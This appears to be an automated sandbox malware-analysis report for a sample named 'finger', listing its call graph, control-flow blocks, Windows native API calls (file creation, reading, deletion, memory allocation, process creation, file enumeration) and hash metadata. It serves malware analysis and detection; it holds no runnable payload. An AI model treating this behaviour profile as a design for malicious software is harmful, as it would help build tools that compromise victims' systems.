600ff3 99655->99656 99657 600fe0 PostThreadMessageW 99655->99657 99657->99656 99744 60fa30 99745 60fa94 99744->99745 99746 606460 2 API calls 99745->99746 99748 60fbc7 99746->99748 99747 60fbce 99748->99747 99773 606570 99748->99773 99750 60fd73 99751 60fd82 99754 619630 NtClose 99751->99754 99752 60fc4a 99752->99750 99752->99751 99777 60f810 99752->99777 99756 60fd8c 99754->99756 99755 60fc86 99755->99751 99757 60fc91 99755->99757 99758 61b7a0 RtlAllocateHeap 99757->99758 99759 60fcba 99758->99759 99760 60fcc3 99759->99760 99761 60fcd9 99759->99761 99762 619630 NtClose 99760->99762 99786 60f700 CoInitialize 99761->99786 99764 60fccd 99762->99764 99765 60fce7 99789 619120 99765->99789 99767 60fd62 99768 619630 NtClose 99767->99768 99769 60fd6c 99768->99769 99770 61b6c0 RtlFreeHeap 99769->99770 99770->99750 99771 60fd05 99771->99767 99772 619120 LdrInitializeThunk 99771->99772 99772->99771 99774 606595 99773->99774 99793 618fe0 99774->99793 99778 60f82c 99777->99778 99779 604700 LdrLoadDll 99778->99779 99781 60f84a 99779->99781 99780 60f853 99780->99755 99781->99780 99782 604700 LdrLoadDll 99781->99782 99783 60f91e 99782->99783 99784 604700 LdrLoadDll 99783->99784 99785 60f97b 99783->99785 99784->99785 99785->99755 99788 60f765 99786->99788 99787 60f7fb CoUninitialize 99787->99765 99788->99787 99790 61913a 99789->99790 99798 3022ba0 LdrInitializeThunk 99790->99798 99791 619167 99791->99771 99794 618ffa 99793->99794 99797 3022c60 LdrInitializeThunk 99794->99797 99795 606609 99795->99752 99797->99795 99798->99791 99799 6074b0 99800 607522 99799->99800 99801 6074c8 99799->99801 99801->99800 99803 60b430 99801->99803 99804 60b456 99803->99804 99809 60b68f 99804->99809 99830 619a00 99804->99830 99806 60b4d2 99806->99809 99833 61c890 99806->99833 99808 60b4f1 99808->99809 99810 60b5c8 99808->99810 99839 618ce0 99808->99839 99809->99800 99813 605ce0 LdrInitializeThunk 99810->99813 99814 60b5e7 99810->99814 99813->99814 99818 60b677 99814->99818 99846 618860 99814->99846 99815 60b5b0 99819 6082a0 LdrInitializeThunk 99815->99819 99816 60b58e 99861 614980 LdrInitializeThunk 99816->99861 99817 60b55c 99817->99809 99817->99815 99817->99816 99843 605ce0 99817->99843 99824 6082a0 LdrInitializeThunk 99818->99824 99823 60b5be 99819->99823 99823->99800 99826 60b685 99824->99826 99825 60b64e 99851 618910 99825->99851 99826->99800 99828 60b668 99856 618a70 99828->99856 99831 619a1a 99830->99831 99832 619a2b CreateProcessInternalW 99831->99832 99832->99806 99834 61c800 99833->99834 99835 61c85d 99834->99835 99836 61b7a0 RtlAllocateHeap 99834->99836 99835->99808 99837 61c83a 99836->99837 99838 61b6c0 RtlFreeHeap 99837->99838 99838->99835 99840 618cfa 99839->99840 99862 3022c0a 99840->99862 99841 60b553 99841->99810 99841->99817 99865 618ea0 99843->99865 99845 605d1e 99845->99816 99847 6188da 99846->99847 99849 618888 99846->99849 99871 30239b0 LdrInitializeThunk 99847->99871 99848 6188fc 99848->99825 99849->99825 99852 61898a 99851->99852 99853 618938 99851->99853 99872 3024340 LdrInitializeThunk 99852->99872 99853->99828 99854 6189ac 99854->99828 99857 618aed 99856->99857 99858 618a9b 99856->99858 99873 3022fb0 LdrInitializeThunk 99857->99873 99858->99818 99859 618b0f 99859->99818 99861->99815 99863 3022c11 99862->99863 99864 3022c1f LdrInitializeThunk 99862->99864 99863->99841 99864->99841 99866 618f51 99865->99866 99867 618ecf 99865->99867 99870 3022d10 LdrInitializeThunk 99866->99870 99867->99845 99868 618f93 99868->99845 99870->99868 99871->99848 99872->99854 99873->99859 99874 606f30 99875 606f5a 99874->99875 99878 6080d0 99875->99878 99877 606f84 99879 6080ed 99878->99879 99885 618dc0 99879->99885 99881 60813d 99882 608144 99881->99882 99883 618ea0 LdrInitializeThunk 99881->99883 99882->99877 99884 60816d 99883->99884 99884->99877 99886 618e5b 99885->99886 99887 618deb 99885->99887 99890 3022f30 LdrInitializeThunk 99886->99890 99887->99881 99888 618e91 99888->99881 99890->99888 99891 60c7b0 99893 60c7d9 99891->99893 99892 60c8dd 99893->99892 99894 60c883 FindFirstFileW 99893->99894 99894->99892 99896 60c89e 99894->99896 99895 60c8c4 FindNextFileW 99895->99896 99897 60c8d6 FindClose 99895->99897 99896->99895 99897->99892 99898 609db0 99900 609dbf 99898->99900 99899 609dc6 99900->99899 99901 61b6c0 RtlFreeHeap 99900->99901 99901->99899 99658 616270 99659 6162ca 99658->99659 99661 6162d7 99659->99661 99662 613c80 99659->99662 99663 61b630 NtAllocateVirtualMemory 99662->99663 99665 613cc1 99663->99665 99664 613dbd 99664->99661 99665->99664 99666 604700 LdrLoadDll 99665->99666 99668 613d07 99666->99668 99667 613d45 Sleep 99667->99668 99668->99664 99668->99667 99902 610330 99903 61034d 99902->99903 99904 604700 LdrLoadDll 99903->99904 99905 61036b 99904->99905 99906 61b3b0 99907 61b3bb 99906->99907 99908 61b3da 99907->99908 99910 615cf0 99907->99910 99911 615d52 99910->99911 99913 615d5f 99911->99913 99914 6024c0 99911->99914 99913->99908 99915 6024d3 99914->99915 99916 60245e 99914->99916 99915->99913 99917 618ce0 LdrInitializeThunk 99916->99917 99918 602496 99917->99918 99919 6196c0 LdrInitializeThunk 99918->99919 99920 6024ab 99919->99920 99920->99913 99921 3022ad0 LdrInitializeThunk 99922 6089bb 99923 6089cb 99922->99923 99924 60897b 99923->99924 99926 607250 99923->99926 99927 60729f 99926->99927 99928 607266 99926->99928 99927->99924 99928->99927 99930 6070c0 LdrLoadDll 99928->99930 99930->99927 99669 5f9ec0 99670 5f9ecf 99669->99670 99671 5f9f10 99670->99671 99672 5f9efd CreateThread 99670->99672 99678 619340 99679 6193f4 99678->99679 99681 61936c 99678->99681 99680 619407 NtCreateFile 99679->99680 99682 61c7c0 99683 61b6c0 RtlFreeHeap 99682->99683 99684 61c7d5 99683->99684 99936 611980 99937 61199c 99936->99937 99938 6119c4 99937->99938 99939 6119d8 99937->99939 99940 619630 NtClose 99938->99940 99941 619630 NtClose 99939->99941 99942 6119cd 99940->99942 99943 6119e1 99941->99943 99946 61b7e0 RtlAllocateHeap 99943->99946 99945 6119ec 99946->99945 99685 6032c3 99690 607f20 99685->99690 99688 619630 NtClose 99689 6032ef 99688->99689 99691 607f3a 99690->99691 99695 6032d3 99690->99695 99696 618d70 99691->99696 99694 619630 NtClose 99694->99695 99695->99688 99695->99689 99697 618d8a 99696->99697 99700 30235c0 LdrInitializeThunk 99697->99700 99698 60800a 99698->99694 99700->99698 99701 6072d0 99702 6072ec 99701->99702 99704 60733f 99701->99704 99703 619630 NtClose 99702->99703 99702->99704 99705 607307 99703->99705 99710 607471 99704->99710 99712 6066f0 NtClose LdrInitializeThunk LdrInitializeThunk 99704->99712 99711 6066f0 NtClose LdrInitializeThunk LdrInitializeThunk 99705->99711 99707 60744e 99707->99710 99713 6068c0 NtClose LdrInitializeThunk LdrInitializeThunk 99707->99713 99711->99704 99712->99707 99713->99710 99949 618c90 99950 618caa 99949->99950 99953 3022df0 LdrInitializeThunk 99950->99953 99951 618ccf 99953->99951 99954 611d10 99955 611d29 99954->99955 99956 611d74 99955->99956 99959 611db7 99955->99959 99961 611dbc 99955->99961 99957 61b6c0 RtlFreeHeap 99956->99957 99958 611d84 99957->99958 99960 61b6c0 RtlFreeHeap 99959->99960 99960->99961 99962 615b90 99963 615bf5 99962->99963 99964 615c2c 99963->99964 99967 6113b0 99963->99967 99966 615c0e 99968 6113c2 99967->99968 99969 61134c 99967->99969 99970 61b630 NtAllocateVirtualMemory 99969->99970 99971 611361 99970->99971 99971->99966 99972 619590 99973 619604 99972->99973 99975 6195b8 99972->99975 99974 619617 NtDeleteFile 99973->99974 99977 5f9f20 99980 5fa1ba 99977->99980 99979 5fa54d 99980->99979 99981 61b320 99980->99981 99982 61b346 99981->99982 99987 5f4120 99982->99987 99984 61b352 99985 61b38b 99984->99985 99990 615800 99984->99990 99985->99979 99994 6033d0 99987->99994 99989 5f412d 99989->99984 99991 615862 99990->99991 99993 61586f 99991->99993 100005 601bb0 99991->100005 99993->99985 99995 6033ea 99994->99995 99997 603400 99995->99997 99998 61a060 99995->99998 99997->99989 100000 61a07a 99998->100000 99999 61a0a9 99999->99997 100000->99999 100001 618ce0 LdrInitializeThunk 100000->100001 100002 61a106 100001->100002 100003 61b6c0 RtlFreeHeap 100002->100003 100004 61a11f 100003->100004 100004->99997 100006 601be8 100005->100006 100021 608030 100006->100021 100008 601bf0 100009 601ec0 100008->100009 100010 61b7a0 RtlAllocateHeap 100008->100010 100009->99993 100011 601c06 100010->100011 100012 61b7a0 RtlAllocateHeap 100011->100012 100013 601c17 100012->100013 100014 61b7a0 RtlAllocateHeap 100013->100014 100015 601c28 100014->100015 100020 601cbf 100015->100020 100036 606bc0 NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 100015->100036 100017 604700 LdrLoadDll 100018 601e72 100017->100018 100032 618140 100018->100032 100020->100017 100022 60805c 100021->100022 100023 607f20 2 API calls 100022->100023 100024 60807f 100023->100024 100026 608089 100024->100026 100028 6080a1 100024->100028 100025 608094 100025->100008 100026->100025 100027 619630 NtClose 100026->100027 100027->100025 100029 6080bd 100028->100029 100030 619630 NtClose 100028->100030 100029->100008 100031 6080b3 100030->100031 100031->100008 100033 6181a2 100032->100033 100035 6181af 100033->100035 100037 601ed0 100033->100037 100035->100009 100036->100020 100053 608300 100037->100053 100039 60244a 100039->100035 100040 601ef0 100040->100039 100057 611340 100040->100057 100043 60210a 100044 61c890 2 API calls 100043->100044 100047 60211f 100044->100047 100045 601f4e 100045->100039 100061 61c760 100045->100061 100046 6082a0 LdrInitializeThunk 100049 60216f 100046->100049 100047->100049 100066 600a00 100047->100066 100049->100039 100049->100046 100050 600a00 LdrInitializeThunk 100049->100050 100050->100049 100051 6082a0 LdrInitializeThunk 100052 6022c3 100051->100052 100052->100049 100052->100051 100054 60830d 100053->100054 100055 608335 100054->100055 100056 60832e SetErrorMode 100054->100056 100055->100040 100056->100055 100058 611359 100057->100058 100059 61b630 NtAllocateVirtualMemory 100058->100059 100060 611361 100059->100060 100060->100045 100062 61c770 100061->100062 100063 61c776 100061->100063 100062->100043 100064 61b7a0 RtlAllocateHeap 100063->100064 100065 61c79c 100064->100065 100065->100043 100069 6198b0 100066->100069 100070 6198ca 100069->100070 100073 3022c70 LdrInitializeThunk 100070->100073 100071 600a22 100071->100052 100073->100071

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 165 5f9f20-5fa1b8 166 5fa1c9-5fa1d2 165->166 167 5fa1e9-5fa1f7 166->167 168 5fa1d4-5fa1e7 166->168 170 5fa202-5fa209 167->170 168->166 171 5fa20b-5fa246 170->171 172 5fa248 170->172 171->170 174 5fa24f-5fa253 172->174 175 5fa26e-5fa27e 174->175 176 5fa255-5fa26c 174->176 175->175 177 5fa280-5fa287 175->177 176->174 178 5fa289-5fa29b 177->178 179 5fa2b1 177->179 181 5fa29d-5fa2a1 178->181 182 5fa2a2-5fa2a4 178->182 180 5fa2b8-5fa2bc 179->180 183 5fa2be-5fa2e8 180->183 184 5fa2ea-5fa2f4 180->184 181->182 185 5fa2af 182->185 186 5fa2a6-5fa2ac 182->186 183->180 187 5fa305-5fa311 184->187 185->177 186->185 188 5fa324-5fa32d 187->188 189 5fa313-5fa322 187->189 190 5fa4fd-5fa504 188->190 191 5fa333-5fa33d 188->191 189->187 193 5fa5cc-5fa5d6 190->193 194 5fa50a-5fa514 190->194 195 5fa34e-5fa357 191->195 196 5fa525-5fa531 194->196 197 5fa359-5fa365 195->197 198 5fa367-5fa36b 195->198 199 5fa548 call 61b320 196->199 200 5fa533-5fa546 196->200 197->195 202 5fa36d-5fa374 198->202 203 5fa377-5fa381 198->203 209 5fa54d-5fa557 199->209 206 5fa516-5fa51f 200->206 202->203 204 5fa392-5fa39e 203->204 207 5fa3b4-5fa3b7 204->207 208 5fa3a0-5fa3b2 204->208 206->196 211 5fa3bd-5fa3c6 207->211 208->204 212 5fa568-5fa571 209->212 215 5fa3eb-5fa3fa 211->215 216 5fa3c8-5fa3e9 211->216 213 5fa587-5fa58b 212->213 214 5fa573-5fa585 212->214 213->193 217 5fa58d-5fa5ae 213->217 214->212 219 5fa3fc-5fa406 215->219 220 5fa44b-5fa452 215->220 216->211 221 5fa5bc-5fa5ca 217->221 222 5fa5b0-5fa5b9 217->222 223 5fa417-5fa420 219->223 224 5fa489-5fa48f 220->224 225 5fa454-5fa487 220->225 221->213 222->221 226 5fa436-5fa446 223->226 227 5fa422-5fa434 223->227 228 5fa493-5fa497 224->228 225->220 226->190 227->223 229 5fa499-5fa4b6 228->229 230 5fa4b8-5fa4c2 228->230 229->228 232 5fa4f8 230->232 233 5fa4c4-5fa4d4 230->233 232->188 234 5fa4e7-5fa4f0 233->234 235 5fa4d6-5fa4e5 233->235 236 5fa4f6 234->236 235->236 236->230
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000008.00000002.3268484619.00000000005F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_8_2_5f0000_finger.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: 5Z$9$<$>$L$N$N$Pw$So$`$fN$j$m$n$X$s
                                                                                                      • API String ID: 0-2357910541
                                                                                                      • Opcode ID: 4c2af9f089e0fcfae82c6820f6eb6b89c132f7cbd260e8750c1974e2b9a86eeb
                                                                                                      • Instruction ID: e66eebd02a527ccc8561777227b347863812d4634d523b1eb94bc992d38e7ffa
                                                                                                      • Opcode Fuzzy Hash: 4c2af9f089e0fcfae82c6820f6eb6b89c132f7cbd260e8750c1974e2b9a86eeb
                                                                                                      • Instruction Fuzzy Hash: 08029EB0D05229CFEB24CF94C898BADBBB2BB44308F1085D9D50D6B281D7B95A85CF56
                                                                                                      APIs
                                                                                                      • FindFirstFileW.KERNELBASE(?,00000000), ref: 0060C894
                                                                                                      • FindNextFileW.KERNELBASE(?,00000010), ref: 0060C8CF
                                                                                                      • FindClose.KERNELBASE(?), ref: 0060C8DA
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000008.00000002.3268484619.00000000005F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_8_2_5f0000_finger.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Find$File$CloseFirstNext
                                                                                                      • String ID:
                                                                                                      • API String ID: 3541575487-0
                                                                                                      • Opcode ID: 74d106090a7080095cc7420a55ff87f1c068363cb79c4006443c16e485b3f75b
                                                                                                      • Instruction ID: 1b8774bb3226bb3bb3d60220483df97879f33df6e71737358b00770c4b044fbe
                                                                                                      • Opcode Fuzzy Hash: 74d106090a7080095cc7420a55ff87f1c068363cb79c4006443c16e485b3f75b
                                                                                                      • Instruction Fuzzy Hash: 1F31B471940308BBDB24EFA0CC85FFF777DEF84754F144559B908A61C1DA70AA848BA4
                                                                                                      APIs
                                                                                                      • NtCreateFile.NTDLL(161FBA40,?,?,?,?,?,?,?,?,?,?), ref: 00619438
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000008.00000002.3268484619.00000000005F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_8_2_5f0000_finger.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CreateFile
                                                                                                      • String ID:
                                                                                                      • API String ID: 823142352-0
                                                                                                      • Opcode ID: 913b0aa7505f0623b442c70bc7bed9716eb88d71eb565b98757f04a2e86dff34
                                                                                                      • Instruction ID: 9a04548eec0f95bc4b750a031ec94c62ad10eb05c059b0db5a619b41519586d1
                                                                                                      • Opcode Fuzzy Hash: 913b0aa7505f0623b442c70bc7bed9716eb88d71eb565b98757f04a2e86dff34
                                                                                                      • Instruction Fuzzy Hash: 6831EFB5A00648ABCB54DF99C881EEEB7F9EF88710F108219F919A7341D730A951CFA4
                                                                                                      APIs
                                                                                                      • NtReadFile.NTDLL(161FBA40,?,?,?,?,?,?,?,?), ref: 00619580
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000008.00000002.3268484619.00000000005F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_8_2_5f0000_finger.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: FileRead
                                                                                                      • String ID:
                                                                                                      • API String ID: 2738559852-0
                                                                                                      • Opcode ID: e6f3ba0a2a121550311ff52ac0598f0ab7352921171cdb98717c8912cdbe003b
                                                                                                      • Instruction ID: ab6ea7b657e06e692cd73636c0e07a0362d775806f82a1678350c96c7a0e8f5b
                                                                                                      • Opcode Fuzzy Hash: e6f3ba0a2a121550311ff52ac0598f0ab7352921171cdb98717c8912cdbe003b
                                                                                                      • Instruction Fuzzy Hash: 1231D2B5A00608ABCB14DF99C881EEFB7F9AF88714F108219F919A7241D734A951CFA4
                                                                                                      APIs
                                                                                                      • NtAllocateVirtualMemory.NTDLL(161FBA40,?,006181AF,00000000,00000004,00003000,?,?,?,?,?,006181AF,00601F4E), ref: 00619855
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000008.00000002.3268484619.00000000005F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_8_2_5f0000_finger.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: AllocateMemoryVirtual
                                                                                                      • String ID:
                                                                                                      • API String ID: 2167126740-0
                                                                                                      • Opcode ID: a1c1bc1c7ed6e412f4197ea02707f05ce7fd928f0e11f28bcc27ba9ea0b3128d
                                                                                                      • Instruction ID: 33c699b1e802ceea5b81bf3fe1c9fa57f9858ce8ec862efcd1280eab57059e08
                                                                                                      • Opcode Fuzzy Hash: a1c1bc1c7ed6e412f4197ea02707f05ce7fd928f0e11f28bcc27ba9ea0b3128d
                                                                                                      • Instruction Fuzzy Hash: 652137B5A00609ABDB10DFA9CC41EEFB7B9EF88700F10861DFD19A7241D734A951CBA5
                                                                                                      APIs
                                                                                                      • NtDeleteFile.NTDLL(161FBA40), ref: 00619620
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000008.00000002.3268484619.00000000005F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_8_2_5f0000_finger.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: DeleteFile
                                                                                                      • String ID:
                                                                                                      • API String ID: 4033686569-0
                                                                                                      • Opcode ID: d7fd5be2052f01351cd39b10a120a2b64c712234ba1b204dfdc6d8a01e2bf1db
                                                                                                      • Instruction ID: 114a0443f2aea431cb623577c28bd669c6864ee778e4e50cff9c0e68eb434911
                                                                                                      • Opcode Fuzzy Hash: d7fd5be2052f01351cd39b10a120a2b64c712234ba1b204dfdc6d8a01e2bf1db
                                                                                                      • Instruction Fuzzy Hash: 4311E071600608BEDB20EB68CC42FEB77ACEF84710F10811CFA08A7281D775AA458BF5
                                                                                                      APIs
                                                                                                      • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 00619661
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000008.00000002.3268484619.00000000005F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_8_2_5f0000_finger.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Close
                                                                                                      • String ID:
                                                                                                      • API String ID: 3535843008-0
                                                                                                      • Opcode ID: 085c86df9dafaac33c1aaa89ff5402a964957b63bb21a493f7364fc0a86431e4
                                                                                                      • Instruction ID: f858eff6d0252e63b0f23dda40dc3e9f6246e5931e6f8ab8f5083bd0781dfe56
                                                                                                      • Opcode Fuzzy Hash: 085c86df9dafaac33c1aaa89ff5402a964957b63bb21a493f7364fc0a86431e4
                                                                                                      • Instruction Fuzzy Hash: 84E08C762012047BC620EA5ADC41FDBBBADDFC6720F008419FA48A7241CA71BA12C7F9
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000008.00000002.3271087733.0000000002FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: true
                                                                                                      • Associated: 00000008.00000002.3271087733.00000000030D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000008.00000002.3271087733.00000000030DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000008.00000002.3271087733.000000000314E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_8_2_2fb0000_finger.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InitializeThunk
                                                                                                      • String ID:
                                                                                                      • API String ID: 2994545307-0
                                                                                                      • Opcode ID: 5a90e2950ac59564da3333199581fca6ed52fdaa9ea5cec07be660a7b39fd826
                                                                                                      • Instruction ID: 709bcaeccebc97e6b7371385014e2658b043a331d2bab08c86d8c4ffe27d884e
                                                                                                      • Opcode Fuzzy Hash: 5a90e2950ac59564da3333199581fca6ed52fdaa9ea5cec07be660a7b39fd826
                                                                                                      • Instruction Fuzzy Hash: 84900231606C0412A140B1588884546405997E1301B55C051F0428554C8B148A5A6361
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000008.00000002.3271087733.0000000002FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: true
                                                                                                      • Associated: 00000008.00000002.3271087733.00000000030D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000008.00000002.3271087733.00000000030DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000008.00000002.3271087733.000000000314E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_8_2_2fb0000_finger.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InitializeThunk
                                                                                                      • String ID:
                                                                                                      • API String ID: 2994545307-0
                                                                                                      • Opcode ID: 33403d723d5fb26d785116439aea343d584693d58b7c144a7c4ed11ada2eadaf
                                                                                                      • Instruction ID: 2231961ee8a76327dce745efc7827b63a826026c8d81d964a373de2c24ca78ff
                                                                                                      • Opcode Fuzzy Hash: 33403d723d5fb26d785116439aea343d584693d58b7c144a7c4ed11ada2eadaf
                                                                                                      • Instruction Fuzzy Hash: 09900261602904425140B1588804406605997E2301395C155B0558560C87188959A269
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000008.00000002.3271087733.0000000002FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: true
                                                                                                      • Associated: 00000008.00000002.3271087733.00000000030D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000008.00000002.3271087733.00000000030DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000008.00000002.3271087733.000000000314E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_8_2_2fb0000_finger.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InitializeThunk
                                                                                                      • String ID:
                                                                                                      • API String ID: 2994545307-0
                                                                                                      • Opcode ID: 7e30a93c7a8332210ef2c15d9d82d1b2f26b7beee72541eaad5d46d909ba29c1
                                                                                                      • Instruction ID: 024e8c8aad868e519211465ea67f468ce821de3d927d0f4df5aee89b7b53aab8
                                                                                                      • Opcode Fuzzy Hash: 7e30a93c7a8332210ef2c15d9d82d1b2f26b7beee72541eaad5d46d909ba29c1
                                                                                                      • Instruction Fuzzy Hash: C2900261203804035105B1588414616405E87E1201B55C061F1018590DC62589957125
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000008.00000002.3271087733.0000000002FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: true
                                                                                                      • Associated: 00000008.00000002.3271087733.00000000030D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000008.00000002.3271087733.00000000030DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000008.00000002.3271087733.000000000314E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_8_2_2fb0000_finger.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InitializeThunk
                                                                                                      • String ID:
                                                                                                      • API String ID: 2994545307-0
                                                                                                      • Opcode ID: 0951fe517f8be5123c675ded89e3b9ca1247f81a487cc8f7368aee75fe4d6e66
                                                                                                      • Instruction ID: e803cdd3d935d6d8b344a9b0c14f4715be502085a8abef133700f942847a2ca9
                                                                                                      • Opcode Fuzzy Hash: 0951fe517f8be5123c675ded89e3b9ca1247f81a487cc8f7368aee75fe4d6e66
                                                                                                      • Instruction Fuzzy Hash: D690023160680C02E150B1588414746005987D1301F55C051B0028654D87558B5976A1
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000008.00000002.3271087733.0000000002FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: true
                                                                                                      • Associated: 00000008.00000002.3271087733.00000000030D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000008.00000002.3271087733.00000000030DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000008.00000002.3271087733.000000000314E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_8_2_2fb0000_finger.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InitializeThunk
                                                                                                      • String ID:
                                                                                                      • API String ID: 2994545307-0
                                                                                                      • Opcode ID: 08f3e477535bfb371c0333597676e8e4a57fd0814c0f0d0779a9083998f070bd
                                                                                                      • Instruction ID: 74e7f356f3c27240e2f4023ec7ade43ee08f1d46840a08f532d1aa28bdc1deb9
                                                                                                      • Opcode Fuzzy Hash: 08f3e477535bfb371c0333597676e8e4a57fd0814c0f0d0779a9083998f070bd
                                                                                                      • Instruction Fuzzy Hash: 3690023120684C42E140B1588404A46006987D1305F55C051B0068694D97258E59B661
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000008.00000002.3271087733.0000000002FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: true
                                                                                                      • Associated: 00000008.00000002.3271087733.00000000030D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000008.00000002.3271087733.00000000030DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000008.00000002.3271087733.000000000314E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_8_2_2fb0000_finger.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InitializeThunk
                                                                                                      • String ID:
                                                                                                      • API String ID: 2994545307-0
                                                                                                      • Opcode ID: 513ee7ff72e37862a281d4548ce1c28e017dffda3235dc3347058507e47f2c9f
                                                                                                      • Instruction ID: 22e617f4aaa89324a8704c4f3645dc1c29162258aeea93874e964d526eaedb82
                                                                                                      • Opcode Fuzzy Hash: 513ee7ff72e37862a281d4548ce1c28e017dffda3235dc3347058507e47f2c9f
                                                                                                      • Instruction Fuzzy Hash: A790023120280C02E180B158840464A005987D2301F95C055B0029654DCB158B5D77A1
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000008.00000002.3271087733.0000000002FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: true
                                                                                                      • Associated: 00000008.00000002.3271087733.00000000030D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000008.00000002.3271087733.00000000030DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000008.00000002.3271087733.000000000314E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_8_2_2fb0000_finger.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InitializeThunk
                                                                                                      • String ID:
                                                                                                      • API String ID: 2994545307-0
                                                                                                      • Opcode ID: 40df63f21435756f062879e78e041014b7edc861f6a20c63b69b2064db7dcc5a
                                                                                                      • Instruction ID: 25216e2b4fcf317c61420b39a096e3f9454d1f197cd41e85a734eb50c134a9e3
                                                                                                      • Opcode Fuzzy Hash: 40df63f21435756f062879e78e041014b7edc861f6a20c63b69b2064db7dcc5a
                                                                                                      • Instruction Fuzzy Hash: A8900225212804031105F5584704507009A87D6351355C061F1019550CD72189656121
                                                                                                      APIs
                                                                                                      Memory Dump Source
